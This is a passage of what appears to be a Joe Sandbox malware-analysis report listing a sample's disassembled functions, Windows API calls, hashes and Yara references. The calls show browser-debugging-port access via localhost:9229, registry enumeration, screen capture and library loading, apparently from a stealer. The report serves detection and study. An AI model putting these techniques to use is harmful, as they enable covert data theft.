                                • Instruction Fuzzy Hash: C0E12770E10218DBDF14DFA8E884ADEBBF5AF48310F1054A9E909B7281DB34AE45CF90
                                Function 00E5D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00E5D9A1
                                • memset.MSVCRT ref: 00E5D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5DA1C
                                • lstrcat.KERNEL32(?,016CEC60), ref: 00E5DA36
                                • lstrcat.KERNEL32(?,?), ref: 00E5DA4A
                                • lstrcat.KERNEL32(?,016CD838), ref: 00E5DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5DA95
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5DAFE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: d449556d00f7a760a55b17efb63152f3edd0b7a46d2022f147f4a1a36df24802
                                • Instruction ID: 483fcd0d0919da2df252285b16fad334ad0103e907038c3d0bd3202a6393e694
                                • Opcode Fuzzy Hash: d449556d00f7a760a55b17efb63152f3edd0b7a46d2022f147f4a1a36df24802
                                • Instruction Fuzzy Hash: 64B1A071D102199FCB20EFA4DC849EEB7B9EF48314F145969F946F3241DA359E48CBA0
                                Function 00E4B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B3D9
                                • lstrlen.KERNEL32(00E74C50), ref: 00E4B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B474
                                • lstrcat.KERNEL32(00000000,00E74C50), ref: 00E4B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B4A9
                                • lstrlen.KERNEL32(00000000), ref: 00E4B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B587
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E4B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B622
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E4B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B65E
                                • lstrlen.KERNEL32(?), ref: 00E4B767
                                • lstrlen.KERNEL32(?), ref: 00E4B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4B79E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 44f8981bc4124895feecaee17c90fee0dc587dc891496336de38bcb49f41852e
                                • Instruction ID: e71aeb113506b8b558417166cc7d1553dfcb15b1e3034487b47781db031b8dbe
                                • Opcode Fuzzy Hash: 44f8981bc4124895feecaee17c90fee0dc587dc891496336de38bcb49f41852e
                                • Instruction Fuzzy Hash: CB027130A01205CFCB25DF69E588B6AB7F5AF44318F19A06DE909BB352D736DC42CB90
                                Function 00E63760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • RegOpenKeyExA.ADVAPI32(?,016CB398,00000000,00020019,?), ref: 00E637BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00E637F7
                                • wsprintfA.USER32 ref: 00E63822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00E63840
                                • RegCloseKey.ADVAPI32(?), ref: 00E6384E
                                • RegCloseKey.ADVAPI32(?), ref: 00E63858
                                • RegQueryValueExA.ADVAPI32(?,016CEA98,00000000,000F003F,?,?), ref: 00E638A1
                                • lstrlen.KERNEL32(?), ref: 00E638B6
                                • RegQueryValueExA.ADVAPI32(?,016CEAC8,00000000,000F003F,?,00000400), ref: 00E63927
                                • RegCloseKey.ADVAPI32(?), ref: 00E63972
                                • RegCloseKey.ADVAPI32(?), ref: 00E63989
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: ae967592da867711e89fe1fcb9e4bfbf2fc0165195b0beec682d5a013d4f6d53
                                • Instruction ID: 38f723bf16fa8c9bd56f7ec6b6362a9a1cf11a79f5fb8d280dccc9b793337278
                                • Opcode Fuzzy Hash: ae967592da867711e89fe1fcb9e4bfbf2fc0165195b0beec682d5a013d4f6d53
                                • Instruction Fuzzy Hash: EB91A172D402089FCB20DFA4E9849EEB7B9FB88354F149569F609B7205D7319E41CFA0
                                Function 00E490C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E490DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E490FC
                                • InternetCloseHandle.WININET(00000000), ref: 00E49109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00E49166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00E49197
                                • InternetCloseHandle.WININET(00000000), ref: 00E491A2
                                • InternetCloseHandle.WININET(00000000), ref: 00E491A9
                                • strlen.MSVCRT ref: 00E491BA
                                • strlen.MSVCRT ref: 00E491ED
                                • strlen.MSVCRT ref: 00E4922E
                                • strlen.MSVCRT ref: 00E4924C
                                  • Part of subcall function 00E48980: std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: c167377caa15264f3fc9b9e40599451dff8c477e3deef977b48451331e02607b
                                • Instruction ID: c810788f267e6c28c82a0405ad80220d0e53e3c5864f46f2a3d37815cd21d716
                                • Opcode Fuzzy Hash: c167377caa15264f3fc9b9e40599451dff8c477e3deef977b48451331e02607b
                                • Instruction Fuzzy Hash: DA51E371A40305ABDB20DBA8EC49BEEF7F9DB48310F145069F944F3280DBB5AA4487A1
                                Function 00E61660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00E616A1
                                • lstrcpy.KERNEL32(00000000,016BA8C0), ref: 00E616CC
                                • lstrlen.KERNEL32(?), ref: 00E616D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E616F6
                                • lstrcat.KERNEL32(00000000,?), ref: 00E61704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6172A
                                • lstrlen.KERNEL32(016CE818), ref: 00E6173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61762
                                • lstrcat.KERNEL32(00000000,016CE818), ref: 00E6176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61792
                                • ShellExecuteEx.SHELL32(?), ref: 00E617CD
                                • ExitProcess.KERNEL32 ref: 00E61803
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a3bcf04e8ca0024ad4cfd632ac72d8602146770d910d20d09beb737ba837157e
                                • Instruction ID: 1ca60b14314bba16af0883542eedc61fd473cc91997cd70c01634a944b1012bc
                                • Opcode Fuzzy Hash: a3bcf04e8ca0024ad4cfd632ac72d8602146770d910d20d09beb737ba837157e
                                • Instruction Fuzzy Hash: 2451A670D01219AFDB22DFA4E884A9EBBF9AF48344F44516AF605F3345DB35AE01CB90
                                Function 00E5EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E5F026
                                • lstrlen.KERNEL32(00000000), ref: 00E5F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00E5F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 00E5F081
                                • lstrlen.KERNEL32(?), ref: 00E5F094
                                • lstrlen.KERNEL32(00000000), ref: 00E5F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5F13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: d7be49d1c3aa565d7ec60861580f805bb70a791f7bfeec5518f1a24cb4f9d95a
                                • Instruction ID: 2ad2a1a9b66370ce2cd0bd4c5ac2e0552507cdd24bb6c1e336edd3e60db48e0a
                                • Opcode Fuzzy Hash: d7be49d1c3aa565d7ec60861580f805bb70a791f7bfeec5518f1a24cb4f9d95a
                                • Instruction Fuzzy Hash: C95191319112019FCB31AF78E849AAE77E5AF45315F04A56DFE49BB346DB30DC058BA0
                                Function 00E4A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(016C8C28,01079BD8,0000FFFF), ref: 00E4A026
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4A053
                                • lstrlen.KERNEL32(01079BD8), ref: 00E4A060
                                • lstrcpy.KERNEL32(00000000,01079BD8), ref: 00E4A08A
                                • lstrlen.KERNEL32(00E74C4C), ref: 00E4A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A0B2
                                • lstrcat.KERNEL32(00000000,00E74C4C), ref: 00E4A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4A114
                                • SetEnvironmentVariableA.KERNEL32(016C8C28,00000000), ref: 00E4A12F
                                • LoadLibraryA.KERNEL32(016B5048), ref: 00E4A143
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: aa7599f23a93a913508b32e2fa992bc56ad8c250cfd5c1fbc7d844fb7582cb8b
                                • Instruction ID: f1c15f74b8ba7abfb445541e34e4ee3535d75699d9897d9890d64601e2435694
                                • Opcode Fuzzy Hash: aa7599f23a93a913508b32e2fa992bc56ad8c250cfd5c1fbc7d844fb7582cb8b
                                • Instruction Fuzzy Hash: 90911970A406009FD7309FA4F848A6737E5EB58728F48A439F545BB355EBBADC40CB92
                                Function 00E5C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5C8A2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5C8D1
                                • lstrlen.KERNEL32(00000000), ref: 00E5C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5C932
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E5C943
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: a110583ea3f916c63083ac0ae205569d059068716f7e930eae3004190faacb6b
                                • Instruction ID: cb3ffff5b384c6b12a678d376629cf858343cdc2086f5c48f63a1eb5696b029a
                                • Opcode Fuzzy Hash: a110583ea3f916c63083ac0ae205569d059068716f7e930eae3004190faacb6b
                                • Instruction Fuzzy Hash: 0561C571D103199FDB21EFB4D844AAE7BF8AF09345F206969FD42F7201D73899498BA0
                                Function 00E641E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00E60CF0), ref: 00E64276
                                • GetDesktopWindow.USER32 ref: 00E64280
                                • GetWindowRect.USER32(00000000,?), ref: 00E6428D
                                • SelectObject.GDI32(00000000,00000000), ref: 00E642BF
                                • GetHGlobalFromStream.COMBASE(00E60CF0,?), ref: 00E64336
                                • GlobalLock.KERNEL32(?), ref: 00E64340
                                • GlobalSize.KERNEL32(?), ref: 00E6434D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
